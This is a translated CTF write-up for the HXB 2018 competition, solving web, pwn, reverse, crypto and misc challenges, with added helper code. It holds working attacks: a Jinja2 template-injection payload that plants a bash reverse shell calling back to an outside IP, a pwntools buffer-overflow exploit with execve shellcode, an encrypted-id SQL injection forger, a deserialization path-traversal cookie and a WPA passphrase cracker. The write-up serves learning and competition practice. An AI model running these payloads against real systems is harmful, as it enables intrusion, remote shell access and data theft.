15 challenges in total, 12 solved.
Competition platform: http://hxb.erangelab.com/
Welcome - SingIn - 50pt
Follow the 合天智汇 WeChat official account and reply hxb2018 to get the flag.
http://hxb2018.oss-cn-beijing.aliyuncs.com/heetian.jpg
hxb2018{W3lc0me_T0_Hxb2o18}
Web - XmeO - 150pt
Where is the administrator's flag?
47.107.235.223:9990
Register an account, log in, submit a Todo List entry and click Show: the entry is rendered through a template, so there is server-side template injection (the payload below is Jinja2 syntax). The first expression writes a bash reverse shell to /tmp/xx1x1 and the second runs it (222.85.25.45:5555 is the author's listener; the subclass index 71 is specific to the target's interpreter):

{{ ''.__class__.__mro__[-1].__subclasses__()[71].__init__.__globals__['os'].system('echo "bash -i >& /dev/tcp/222.85.25.45/5555 0>&1">/tmp/xx1x1') }}
{{ ''.__class__.__mro__[-1].__subclasses__()[71].__init__.__globals__['os'].system('bash /tmp/xx1x1') }}

Once the shell is in, search the whole filesystem for the flag (keyword hxb).
Flag: hxb2018{510243761ff63759ed7fe96ca2759e45}
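Added example, not part of the writeup: the [71] in the payload is environment-specific, because the order of object.__subclasses__() depends on which modules the target has imported. This stdlib-only helper enumerates candidate gadgets the same way the payload does (a subclass whose __init__ globals reach os.system), confirms each candidate really resolves to os.system, and prints the Jinja2 expression for it. It assumes only that the interpreter has os loaded, which any Flask/Jinja2 app does; it executes no command.

```python
import os  # assumption: the target interpreter has os loaded, as any Flask/Jinja2 app does


def os_gadgets():
    """Walk object.__subclasses__() and return (index, class name, attribute path) for every
    class whose __init__ globals lead to os.system, which is what the payload's [71] relies on."""
    hits = []
    for idx, cls in enumerate(object.__subclasses__()):
        try:
            g = getattr(getattr(cls, "__init__", None), "__globals__", None)
        except Exception:  # exotic metaclasses may refuse attribute access; skip them
            continue
        if not isinstance(g, dict):  # a C-implemented __init__ (slot wrapper) has no __globals__
            continue
        if hasattr(g.get("os"), "system"):  # a module that did `import os`
            hits.append((idx, cls.__name__, "__globals__['os'].system"))
        elif callable(g.get("system")) and "popen" in g:  # globals *are* os.__dict__, e.g. os._wrap_close
            hits.append((idx, cls.__name__, "__globals__['system']"))
    return hits


def verify_gadget(idx, path):
    """Follow the path through the live interpreter and confirm it really is os.system."""
    g = object.__subclasses__()[idx].__init__.__globals__
    target = g["os"].system if path.startswith("__globals__['os']") else g["system"]
    return target is os.system


def jinja_payload(idx, path, cmd):
    """Jinja2 expression in the writeup's shape, with the discovered index and path filled in."""
    return "{{ ''.__class__.__mro__[-1].__subclasses__()[%d].__init__.%s(%r) }}" % (idx, path, cmd)


if __name__ == "__main__":
    for idx, name, path in os_gadgets():
        print(idx, name, verify_gadget(idx, path), jinja_payload(idx, path, "id"))
```

Run it inside the same Python version and framework as the target to get a usable index; on a live target the equivalent enumeration is done from the template itself by iterating over the subclasses list and printing names.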
Web - Code Check - 200pt
code check 120.79.246.58:49882
The leaked source contains news/list.php.
Source leak: http://120.79.246.58:49882/news/list.zip

<?php
header('content-type:text/html;charset=utf-8');
require_once '../config.php';

// decryption routine
function decode($data){
    $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');
    mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');
    $data = mdecrypt_generic($td,base64_decode(base64_decode($data)));
    mcrypt_generic_deinit($td);
    mcrypt_module_close($td);
    if(substr(trim($data),-7)!=='hxb2018'){
        echo '<script>window.location.href="/index.php";</script>';
    }else{
        return substr(trim($data),0,strlen(trim($data))-7);
    }
}

$id=decode($_GET['id']);
$sql="select id,title,content,time from notice where id=$id";   // decrypted value spliced in unquoted
$info=$link->query($sql);
$arr=$info->fetch_assoc();
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>X公司HR系统V1.0</title>
<style>.body{width:600px;height:500px;margin:0 auto}.title{color:red;height:60px;line-height:60px;font-size:30px;font-weight:700;margin-top:75pt;border-bottom:2px solid red;text-align:center}.content,.title{margin:0 auto;width:600px;display:block}.content{height:30px;line-height:30px;font-size:18px;margin-top:40px;text-align:left;color:#828282}</style>
</head>
<body>
<div class="body">
<div class="title"><?php echo $arr['title']?></div>
<div class="content"><?php echo $arr['content']?></div>
</body>
Encoder (the inverse of decode(), with the same key and IV):

<?php
function encode($data){
    $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');
    mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');
    $da = mcrypt_generic($td,$data);
    mcrypt_generic_deinit($td);
    mcrypt_module_close($td);
    return base64_encode(base64_encode($da));
}
So the target is SQL injection through id, which is merely encrypted: decode() splices the decrypted value into the query unquoted, and because the key and IV are hard-coded in the leaked source anyone can produce valid ciphertexts. A normal request looks like this:
http://120.79.246.58:49882/news/list.php?id=b3FCRU5iOU9IemZYc1JQSkY0WG5JZ0
Enumerated through the injection:
databases: information_schema, mozhe_discuz_stormgroup, mysql, test
mozhe_discuz_stormgroup: notice, notice2, stormgroup_member
notice: id, title, content, time
notice2: id, title
stormgroup_member: id, name, password, status
Build the payload with the encoder (the hxb2018 suffix is what decode() checks for and strips; four columns match the original select, and the second one is echoed as the page title):
var_dump(encode("0 union select 1,(select group_concat(title) from notice2),3,4hxb2018"));
http://120.79.246.58:49882/news/list.php?id=K3hId1N2UVpNcjFENkFja0FtMHdrM0pscGduTzFNZk1uZzVVVVdLK2hjbDVqUTBhOFl6b29YOFA1amZ5R3NUeVZOdDdOZ2luNmZMaXV4bmNRZVd1Yi9CV2hmaGJTbUdJTjJrdndKQjBEam89
Flag: hxb2018{088425ca08783233bbe9d21a3015f5f6}
Web - MyNote - 350pt
Cookie deserialization. The error below shows Views.php calling file_get_contents() on a path that comes from the deserialized cookie:

Warning: file_get_contents(./upload/9dd4e461268c8034f5c8564e155c67a6/1.php): failed to open stream: No such file or directory in /var/www/html/views/Views.php on line 65

So serialize an array whose entry traverses to flag.php:

<?php
$b=array("../../flag.php");
var_dump(serialize($b));
var_dump(base64_encode(serialize($b)));
unserialize(serialize($b));

Cookie value: YToxOntpOjA7czoxNDoiLi4vLi4vZmxhZy5waHAiO30=
The response comes back base64-encoded:
PD9waHAKCiRmbGFnID0gImh4YjIwMTh7ODNmMmVhMDBiOTczNWQyYTQ1ZjMxNGJmMmViZmVhZTB9IjsKZWNobyAiZmxhZ3tUaGlzX2ZsYWdfaVNfQV9GNGtlX2ZsYWd9IjsKCg==
Decoded, that is flag.php:

<?php
$flag = "hxb2018{83f2ea00b9735d2a45f314bf2ebfeae0}";
echo "flag{This_flag_iS_A_F4ke_flag}";
Flag: hxb2018{83f2ea00b9735d2a45f314bf2ebfeae0}
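Added example, not part of the writeup: building the cookie without a PHP interpreter. The helper below reproduces PHP's serialize() format for the scalar and array types that unserialize() gadgets usually need, and the one-element array it emits for "../../flag.php" base64-encodes to exactly the cookie value above. The pitfall worth remembering is that s:N: counts bytes, not characters, which matters as soon as a path or payload contains non-ASCII.

```python
import base64


def php_serialize(value):
    """PHP serialize() format for the types unserialize() gadgets usually need: null, bool, int,
    str/bytes, list (array keyed 0..n-1) and dict (array with int or string keys). Returns bytes."""
    if value is None:
        return b"N;"
    if isinstance(value, bool):  # must come before int: bool is a subclass of int
        return b"b:%d;" % value
    if isinstance(value, int):
        return b"i:%d;" % value
    if isinstance(value, str):
        value = value.encode("utf-8")
    if isinstance(value, bytes):  # s:N: counts BYTES, not characters
        return b's:%d:"%s";' % (len(value), value)
    if isinstance(value, list):
        value = dict(enumerate(value))
    if isinstance(value, dict):
        body = b"".join(php_serialize(k) + php_serialize(v) for k, v in value.items())
        return b"a:%d:{%s}" % (len(value), body)
    raise TypeError("no PHP serialization for %r" % type(value).__name__)


def cookie_for(path):
    """The MyNote cookie: a one-element array whose entry is the file the view will read."""
    return base64.b64encode(php_serialize([path])).decode("ascii")


if __name__ == "__main__":
    print(cookie_for("../../flag.php"))  # YToxOntpOjA7czoxNDoiLi4vLi4vZmxhZy5waHAiO30=
```

cookie_for() with any other path reads whatever file the web server user can open; the base64 wrapper is the page's own convention for the cookie, not something PHP requires.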
Misc - Flow - 200pt
Traffic forensics: some secrets are hidden in this capture, can you find them?
http://hxb2018.oss-cn-beijing.aliyuncs.com/misc/flow_6D1210D1307A67E4A428602F722E6803.zip
The capture consists entirely of 802.11 frames.
Run a dictionary attack against the WPA handshake with aircrack-ng.
That gives the SSID ctf and the passphrase password1.
Enter the key in Wireshark's 802.11 decryption settings (IEEE 802.11 protocol preferences, a key of type wpa-pwd with the value password1:ctf).
Then apply the display filter http
and the flag is visible in the decrypted traffic.
Flag: flag{H4lf_1s_3n0ugh}
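Added example, not part of the writeup: what aircrack-ng actually does for every candidate in the wordlist. The block derives the PMK from passphrase and SSID (PBKDF2-HMAC-SHA1, 4096 rounds), expands it to the PTK with the 802.11i PRF over both MAC addresses and both nonces, and recomputes the MIC of EAPOL handshake message 2 with the KCK; a candidate is correct when the MIC matches the captured one. It assumes WPA2/CCMP (key descriptor version 2, HMAC-SHA1 MIC) and, since no frames from the challenge pcap are reproduced here, builds a constructed handshake with fixed MACs and nonces whose MIC was computed with password1 on SSID ctf. The PBKDF2 step is checked against the 802.11i test vector for passphrase "password" and SSID "IEEE".

```python
import hashlib
import hmac

MIC_OFFSET = 81  # EAPOL-Key: 4-byte 802.1X header, then 77 bytes of descriptor fields before the 16-byte MIC


def wpa_pmk(passphrase, ssid):
    """WPA/WPA2-PSK pairwise master key: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key, label, data):
    """IEEE 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, cut to 64 bytes."""
    blocks = (hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest() for i in range(4))
    return b"".join(blocks)[:64]


def wpa_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA) || max(AA,SPA) || min(nonces) || max(nonces))."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol):
    """MIC of an EAPOL-Key frame for WPA2/CCMP (descriptor version 2): HMAC-SHA1 over the frame with
    the MIC field zeroed, truncated to 16 bytes. (WPA/TKIP, version 1, uses HMAC-MD5; assumed not here.)"""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_psk(ssid, hs, wordlist):
    """Per candidate, what aircrack-ng does: PMK -> PTK -> KCK (first 16 bytes) -> recompute the MIC
    of handshake message 2 and compare it with the captured one."""
    captured = hs["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        ptk = wpa_ptk(wpa_pmk(word, ssid), hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], hs["eapol"]), captured):
            return word
    return None


def sample_handshake(passphrase="password1", ssid="ctf"):
    """Constructed stand-in for the challenge capture (no frames from the real pcap are reproduced):
    fixed MACs and nonces, and a 99-byte EAPOL-Key message 2 whose MIC is computed with `passphrase`."""
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    # 802.1X header (v1, EAPOL-Key, body length 95), descriptor type 2, key info 0x010a (MIC set,
    # pairwise, version 2), key length 16, then replay counter, nonce, IV, RSC, ID, MIC (zeroed)
    # and a zero key-data length
    eapol = bytearray(b"\x01\x03\x00\x5f\x02\x01\x0a\x00\x10" + bytes(88) + b"\x00\x00")
    eapol[17:49] = snonce  # the nonce field of message 2 carries the SNonce
    hs = {"ap_mac": ap_mac, "sta_mac": sta_mac, "anonce": anonce, "snonce": snonce}
    kck = wpa_ptk(wpa_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    eapol[MIC_OFFSET:MIC_OFFSET + 16] = eapol_mic(kck, bytes(eapol))
    hs["eapol"] = bytes(eapol)
    return hs


if __name__ == "__main__":
    hs = sample_handshake()
    print(crack_psk("ctf", hs, ["123456", "password", "password1", "letmein"]))  # password1
```

Against a real capture you would fill the dictionary from the beacon (SSID), the handshake frames (both MACs, ANonce from message 1, SNonce and the EAPOL bytes of message 2) instead of calling sample_handshake(); everything else stays the same. The PBKDF2 cost is why a wrong SSID or a large wordlist is expensive, and why aircrack-ng caches PMKs per SSID.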
Reverse - HighwayHash64 - 300pt
Computing hashes in your head? That must be you~
http://hxb2018.oss-cn-beijing.aliyuncs.com/reserves/reverse_1CE475F54D2A3264A8ED743FDFEF24A8.zip
sub_1400017A0 computes a HighwayHash64 digest.
Flag format: hxb2018{xxxxx}
The first check validates the flag length; brute-forcing it shows the length is 19.
The second check validates the value inside the braces, which can be brute-forced as well.
Note that the hash's initialization constants were changed, so a stock HighwayHash library must be patched to match the binary before its digests are comparable.
Brute-force script for the value inside the braces:

from highwayhash import *   # https://github.com/kpdemetriou/highwayhash-cffi
# you need to modify sources/highwayhash.c so that HighwayHashReset uses the
# binary's constants instead of the stock ones:
# void HighwayHashReset(const uint64_t key[4], HighwayHashState* state) {
#   state->mul0[0] = 0x1BE6D5D5FE4CCE2Full;
#   state->mul0[1] = 0x24093822299F31D0ull;
#   state->mul0[2] = 0x33198A2E03707344ull;
#   state->mul0[3] = 0x443F6A8885A308D3ull;
#   state->mul1[0] = 0x5BD39E10CB0EF593ull;
#   state->mul1[1] = 0x60ACF169B5F18A8Cull;
#   state->mul1[2] = 0x7E5466CF34E90C6Cull;
#   state->mul1[3] = 0x852821E638D01377ull;
#   state->v0[0] = 0xCF0C0C1ED5EDF3E;
#   state->v0[1] = state->mul0[1] ^ 0x3F3E3D3C3B3A1918ull;
#   state->v0[2] = state->mul0[2] ^ 0x1226252423222121ull;
#   state->v0[3] = state->mul0[3] ^ 0x2F2E2D2C2B2A2928ull;
#   state->v1[0] = state->mul1[0] ^ 0x1312111117161514ull;
#   state->v1[1] = state->mul1[1] ^ 0x3B3A19183F3E3D3Cull;
#   state->v1[2] = state->mul1[2] ^ 0x2322212112262524ull;
#   state->v1[3] = state->mul1[3] ^ 0x2B2A29282F2E2D2Cull;
# }
# and then run `python3 setup.py install` to build & install it

key = b"\x00" * 32   # ignored by the patched Reset above, which hard-codes the state

i = 0
while True:
    i += 1
    if i % 100000 == 0:
        print(i / float(10000000000))   # progress across the 10-digit search space
    data = str(i).rjust(10, '0')
    data = bytes(data, 'ascii')
    op = highwayhash_64(key, data)
    if op == b'\x5a\x54\x30\x87\xaf\x26\xbe\xe3':   # the digest the binary compares against
        print(i)
        break

The brute force yields the value inside the braces, which is a Unix timestamp (1532649708 is 2018-07-27 UTC).
Flag: hxb2018{1532649708}
Reverse - Replace - 300pt
Simple... cryptography~
http://hxb2018.oss-cn-beijing.aliyuncs.com/reserves/Replace_B21DA8B2F172C13764989DF0F99B890A.rar
Very simple; the script is below. The table r is the AES S-box, so the loop that searches r for a matching entry is an inverse S-box lookup: each plaintext byte was substituted through the S-box and then XORed with 0x19.

r = [
    0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5, 0x30, 0x01, 0x67, 0x2B, 0xFE, 0xD7, 0xAB, 0x76,
    0xCA, 0x82, 0xC9, 0x7D, 0xFA, 0x59, 0x47, 0xF0, 0xAD, 0xD4, 0xA2, 0xAF, 0x9C, 0xA4, 0x72, 0xC0,
    0xB7, 0xFD, 0x93, 0x26, 0x36, 0x3F, 0xF7, 0xCC, 0x34, 0xA5, 0xE5, 0xF1, 0x71, 0xD8, 0x31, 0x15,
    0x04, 0xC7, 0x23, 0xC3, 0x18, 0x96, 0x05, 0x9A, 0x07, 0x12, 0x80, 0xE2, 0xEB, 0x27, 0xB2, 0x75,
    0x09, 0x83, 0x2C, 0x1A, 0x1B, 0x6E, 0x5A, 0xA0, 0x52, 0x3B, 0xD6, 0xB3, 0x29, 0xE3, 0x2F, 0x84,
    0x53, 0xD1, 0x00, 0xED, 0x20, 0xFC, 0xB1, 0x5B, 0x6A, 0xCB, 0xBE, 0x39, 0x4A, 0x4C, 0x58, 0xCF,
    0xD0, 0xEF, 0xAA, 0xFB, 0x43, 0x4D, 0x33, 0x85, 0x45, 0xF9, 0x02, 0x7F, 0x50, 0x3C, 0x9F, 0xA8,
    0x51, 0xA3, 0x40, 0x8F, 0x92, 0x9D, 0x38, 0xF5, 0xBC, 0xB6, 0xDA, 0x21, 0x10, 0xFF, 0xF3, 0xD2,
    0xCD, 0x0C, 0x13, 0xEC, 0x5F, 0x97, 0x44, 0x17, 0xC4, 0xA7, 0x7E, 0x3D, 0x64, 0x5D, 0x19, 0x73,
    0x60, 0x81, 0x4F, 0xDC, 0x22, 0x2A, 0x90, 0x88, 0x46, 0xEE, 0xB8, 0x14, 0xDE, 0x5E, 0x0B, 0xDB,
    0xE0, 0x32, 0x3A, 0x0A, 0x49, 0x06, 0x24, 0x5C, 0xC2, 0xD3, 0xAC, 0x62, 0x91, 0x95, 0xE4, 0x79,
    0xE7, 0xC8, 0x37, 0x6D, 0x8D, 0xD5, 0x4E, 0xA9, 0x6C, 0x56, 0xF4, 0xEA, 0x65, 0x7A, 0xAE, 0x08,
    0xBA, 0x78, 0x25, 0x2E, 0x1C, 0xA6, 0xB4, 0xC6, 0xE8, 0xDD, 0x74, 0x1F, 0x4B, 0xBD, 0x8B, 0x8A,
    0x70, 0x3E, 0xB5, 0x66, 0x48, 0x03, 0xF6, 0x0E, 0x61, 0x35, 0x57, 0xB9, 0x86, 0xC1, 0x1D, 0x9E,
    0xE1, 0xF8, 0x98, 0x11, 0x69, 0xD9, 0x8E, 0x94, 0x9B, 0x1E, 0x87, 0xE9, 0xCE, 0x55, 0x28, 0xDF,
    0x8C, 0xA1, 0x89, 0x0D, 0xBF, 0xE6, 0x42, 0x68, 0x41, 0x99, 0x2D, 0x0F, 0xB0, 0x54, 0xBB, 0x16,
]
t = '2a49f69c38395cde96d6de96d6f4e025484954d6195448def6e2dad67786e21d5adae6'
flag = ''
for i in range(35):
    # parse one hex byte by hand: '0'-'9' -> 0-9, 'a'-'f' -> 10-15
    t1 = ord(t[2 * i])
    t2 = ord(t[2 * i + 1])
    if t1 < 48 or t1 > 57:
        t1 -= 87
    else:
        t1 -= 48
    if t2 < 48 or t2 > 57:
        t2 -= 87
    else:
        t2 -= 48
    t1 &= 0xff
    t2 &= 0xff
    tmp = (t1 * 16 + t2) ^ 0x19
    tmp &= 0xff
    for j in range(len(r)):   # inverse S-box lookup
        if r[j] == tmp:
            flag += chr(j)
            break
print(flag)
Flag: flag{Th1s_1s_Simple_Rep1ac3_Enc0d3}
Crypto - Common Crypto - 200pt
Please enter your flag http://hxb2018.oss-cn-beijing.aliyuncs.com/crypto/crypto_3ED9C81B3AD33F8ABEA1984B2B69284A.zip
AES, and fairly simple.
Script (Python 3 with pycryptodome; only the first 16 bytes of the blob are an AES block, the remaining 16 bytes are already ASCII):

from Crypto.Cipher import AES   # pycryptodome

enc = bytes.fromhex('461559ceb56d277df44a31ae89f08a6a33626430326635343563373032383031')
key = b'\x1B\x2E\x35\x46\x58\x6E\x72\x86\x9B\xA7\xB5\xC8\xD9\xEF\xFF\x0C'
c = AES.new(key, AES.MODE_ECB)   # ECB takes no IV; the old PyCrypto version silently ignored one
print(c.decrypt(enc[:16]) + enc[16:] + b'}')
Flag: hxb2018{bc69322f3bd02f545c702801}
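Added example, shared by Code Check and Common Crypto (my code, not the writeup's): both challenges are plain AES-128 (mcrypt's MCRYPT_RIJNDAEL_128 with a 16-byte key is AES-128, and mcrypt no longer exists in current PHP anyway), so the block below implements AES-128 from FIPS-197 with only the standard library and then uses it twice. forge_id() replays the leaked encode() exactly (CBC with the hard-coded key and IV, mcrypt's NUL padding, the hxb2018 suffix, base64 twice), so any SQL fragment becomes a valid id; decode_id() mirrors the server's decode() to show what will be spliced into the query; common_crypto_flag() does the single-block ECB decryption of the Common Crypto script without PyCrypto. The S-box is generated rather than pasted; the 256-byte table r[] in the Replace challenge above is the same S-box.

```python
import base64

# ---- AES-128 (FIPS-197) with nothing but the standard library ---------------------
def _gf_mul(a, b):   # multiply in GF(2^8) modulo x^8 + x^4 + x^3 + x + 1
    p = 0
    while b:
        if b & 1:
            p ^= a
        a = ((a << 1) ^ 0x1b) & 0xff if a & 0x80 else a << 1
        b >>= 1
    return p

def _build_sbox():
    """S-box = multiplicative inverse then affine map, generated instead of pasted (the 256-byte
    table r[] in the Replace challenge above is exactly this table)."""
    sbox, p, q = [0] * 256, 1, 1
    rot = lambda x, s: ((x << s) | (x >> (8 - s))) & 0xff
    for _ in range(255):                                         # 3 generates GF(2^8)*, so 255 steps
        p = (p ^ (p << 1) ^ (0x1b if p & 0x80 else 0)) & 0xff   # p *= 3
        q ^= (q << 1) & 0xff                                     # q /= 3, keeping q == p^-1
        q ^= (q << 2) & 0xff
        q ^= (q << 4) & 0xff
        q ^= 0x09 if q & 0x80 else 0
        sbox[p] = q ^ rot(q, 1) ^ rot(q, 2) ^ rot(q, 3) ^ rot(q, 4) ^ 0x63
    sbox[0] = 0x63
    return sbox

SBOX = _build_sbox()
INV_SBOX = [SBOX.index(v) for v in range(256)]

def expand_key(key):   # AES-128 key schedule -> 11 round keys of 16 bytes, same byte order as the state
    w = [list(key[i:i + 4]) for i in range(0, 16, 4)]
    rcon = 1
    for i in range(4, 44):
        t = w[i - 1][:]
        if i % 4 == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]   # RotWord + SubWord
            t[0] ^= rcon
            rcon = _gf_mul(rcon, 2)
        w.append([a ^ b for a, b in zip(w[i - 4], t)])
    return [sum(w[4 * r:4 * r + 4], []) for r in range(11)]

def _shift_rows(s, inv=False):   # state is column-major, s[4*c + r]; row r rotates by r
    return [s[4 * ((c - r if inv else c + r) % 4) + r] for c in range(4) for r in range(4)]

def _mix_columns(s, inv=False):
    m = (14, 11, 13, 9) if inv else (2, 3, 1, 1)   # first row of the (inverse) circulant matrix
    return [_gf_mul(m[(0 - r) % 4], s[4 * c]) ^ _gf_mul(m[(1 - r) % 4], s[4 * c + 1])
            ^ _gf_mul(m[(2 - r) % 4], s[4 * c + 2]) ^ _gf_mul(m[(3 - r) % 4], s[4 * c + 3])
            for c in range(4) for r in range(4)]

def encrypt_block(block, rk):
    s = [b ^ k for b, k in zip(block, rk[0])]
    for rnd in range(1, 11):
        s = _shift_rows([SBOX[b] for b in s])
        if rnd < 10:
            s = _mix_columns(s)
        s = [b ^ k for b, k in zip(s, rk[rnd])]
    return bytes(s)

def decrypt_block(block, rk):
    s = [b ^ k for b, k in zip(block, rk[10])]
    for rnd in range(9, -1, -1):
        s = [INV_SBOX[b] for b in _shift_rows(s, inv=True)]
        s = [b ^ k for b, k in zip(s, rk[rnd])]
        if rnd > 0:
            s = _mix_columns(s, inv=True)
    return bytes(s)

# ---- Code Check: key and IV are hard-coded in the leaked list.php -----------------------
KEY, IV = b"ydhaqPQnexoaDuW3", b"2018201920202021"

def forge_id(sql):
    """Same transform as encode(): AES-128-CBC (mcrypt NUL-pads to 16 bytes), the 'hxb2018'
    suffix that decode() checks for, then base64 twice."""
    data = sql.encode() + b"hxb2018"
    data += b"\x00" * (-len(data) % 16)
    rk, out, prev = expand_key(KEY), b"", IV
    for i in range(0, len(data), 16):
        prev = encrypt_block(bytes(a ^ b for a, b in zip(data[i:i + 16], prev)), rk)
        out += prev
    return base64.b64encode(base64.b64encode(out)).decode()

def decode_id(token):
    """Mirror of the server's decode(): the fragment it will splice into the SQL, or None if rejected."""
    raw = base64.b64decode(base64.b64decode(token))
    rk, out, prev = expand_key(KEY), b"", IV
    for i in range(0, len(raw), 16):
        out += bytes(a ^ b for a, b in zip(decrypt_block(raw[i:i + 16], rk), prev))
        prev = raw[i:i + 16]
    data = out.rstrip(b"\x00")   # PHP's trim() strips the NUL padding
    return data[:-7] if data.endswith(b"hxb2018") else None

# ---- Common Crypto: one ECB block of ciphertext, then 16 bytes that are already ASCII ----
def common_crypto_flag():
    enc = bytes.fromhex("461559ceb56d277df44a31ae89f08a6a33626430326635343563373032383031")
    key = bytes.fromhex("1b2e3546586e72869ba7b5c8d9efff0c")
    return decrypt_block(enc[:16], expand_key(key)) + enc[16:] + b"}"
```

forge_id("0 union select 1,(select group_concat(title) from notice2),3,4") reproduces the id used in the Code Check request, and common_crypto_flag() returns the Common Crypto flag. The design lesson on the Code Check side is that encrypting a parameter is not authentication: without a MAC, and with key and IV shipped in the source, the "encrypted" id offers no more protection than a plain integer, and the only real fix is a parameterised query.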
Reverse - More efficient than JS - 300pt
Blue Firefox goes better with yellow Chrome~
http://hxb2018.oss-cn-beijing.aliyuncs.com/reserves/attach_9550FD3DD9774159E9955E2A0E389842.zip
A wasm module; wasmdec can turn it into pseudo-C,
and manual analysis then recovers the verification routine: it is RC4 with the key I_am_key from the data segment, applied to the 15 ciphertext bytes at the start of that segment.
Decryption script:

mem_data = [
    0xdf, 0x81, 0x7f, 0x20, 0x07, 0xc4, 0x0d, 0x1c, 0xc9, 0x9e, 0x8e, 0x17, 0xd7, 0xed, 0x78,   # ciphertext (15 bytes)
    0x50, 0x6c, 0x65, 0x61, 0x73, 0x65, 0x20, 0x69, 0x6e, 0x70, 0x75, 0x74, 0x20, 0x79, 0x6f,
    0x75, 0x72, 0x20, 0x66, 0x6c, 0x61, 0x67, 0x3a, 0x0a, 0x00,                                 # "Please input your flag:\n"
    0x25, 0x73, 0x00,                                                                            # "%s"
    0x49, 0x5f, 0x61, 0x6d, 0x5f, 0x6b, 0x65, 0x79, 0x00,                                        # "I_am_key"
    0x79, 0x65, 0x73, 0x00, 0x6e, 0x6f, 0x00,                                                    # "yes", "no"
    0x69, 0x6e, 0x66, 0x69, 0x6e, 0x69, 0x74, 0x79, 0x00,                                        # "infinity"
    0x00, 0x01, 0x02, 0x04, 0x07, 0x03, 0x06, 0x05, 0x00,
    0x2d, 0x2b, 0x20, 0x20, 0x20, 0x30, 0x58, 0x30, 0x78, 0x00,
    0x28, 0x6e, 0x75, 0x6c, 0x6c, 0x29, 0x00,                                                    # "(null)"
    0x2d, 0x30, 0x58, 0x2b, 0x30, 0x58, 0x20, 0x30, 0x58, 0x2d, 0x30, 0x78, 0x2b, 0x30, 0x78, 0x20, 0x30, 0x78, 0x00,
    0x69, 0x6e, 0x66, 0x00, 0x49, 0x4e, 0x46, 0x00, 0x6e, 0x61, 0x6e, 0x00, 0x4e, 0x41, 0x4e, 0x00, 0x2e,
]
mem = bytes(mem_data)
key = mem[4475 - 1024 - 3408:4475 - 1024 - 3408 + 8]     # b'I_am_key'
enc = mem[4432 - 1024 - 3408:4432 - 1024 - 3408 + 15]    # the 15 ciphertext bytes
print(key)
print(enc.hex())

# RC4 key scheduling
table1 = list(range(256))
table2 = [key[i % 8] for i in range(256)]
tmp = 0
for i in range(256):
    tmp = (tmp + table1[i] + table2[i]) & 0xff
    table1[i], table1[tmp] = table1[tmp], table1[i]

# RC4 keystream generation, XORed with the ciphertext
flag = ''
tmp = 0
for i in range(len(enc)):
    c = (i + 1) & 0xff
    tmp = (tmp + table1[c]) & 0xff
    table1[c], table1[tmp] = table1[tmp], table1[c]
    flag += chr(enc[i] ^ table1[(table1[c] + table1[tmp]) & 0xff])
print(flag)
Flag: flag{happy_rc4}
PWN - Regex Format - 350pt
The key point is the regex-matching step: &s on the stack can be overflowed, so write shellcode into .bss and then return into it.
PoC:

from pwn import *

# io = process('./pwn1')
io = remote('47.107.172.28', 8888)

payload = b':a\x08\x04\xa3\x50$*'
io.sendafter(b'format\n', payload)

shellcode = b'\x90' * 5
shellcode += b'\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80'   # execve("/bin//sh"), 32-bit x86
payload = b'Before use it, understand it first.'
payload += b'a' * 0xd8 + p32(0x804a350) + shellcode   # 0x804a350 lies in .bss
io.sendafter(b'match\n', payload)
print(io.sendlineafter(b'[Y/n]\n', b'n'))
io.interactive()
Flag: hxb2018{214ebb03581966cf32cc351dd233e7fc}
Web - Readflag - 250pt
The page hints at SSRF through the url parameter.
The response headers identify Apache, so read its configuration file through the SSRF.
That reveals the PHP files under the web root; read those next.
Under one condition the source invokes a readflag binary, which yields the flag.
So download readflag and reverse it:
the flag file is simply named flag, and it can be read directly.
Flag: hxb2018{0ef0c0d15f1a22b47af2a01669fbf124}
Misc - Disk - 200pt
Disk steganography: some secrets are hidden on this disk, can you find them?
http://hxb2018.oss-cn-beijing.aliyuncs.com/misc/disk_95ED58BC6E172FABFEE602D4513E2BE7.zip
The archive contains a vmdk whose filesystem is NTFS; RecuperaBit can parse it.
Commands (the last two are typed at RecuperaBit's prompt):

python main.py ctf-flat.vmdk
recoverable
tree 0

The tree shows four files, flag0.txt, flag1.txt, flag2.txt and flag3.txt, each containing only "flag is not here."
All four also carry an alternate data stream (ADS), so the hidden data must be there.
Export the streams one by one:

restore 0 33:ads
restore 0 34:ads
restore 0 35:ads
restore 0 36:ads

The four exported streams appear in the default recuperabit_output folder.
Each consists of 1s and 0s; concatenate the four in order, convert the binary to ASCII, and the flag appears.
Flag: flag{4DS_1n_D1sk}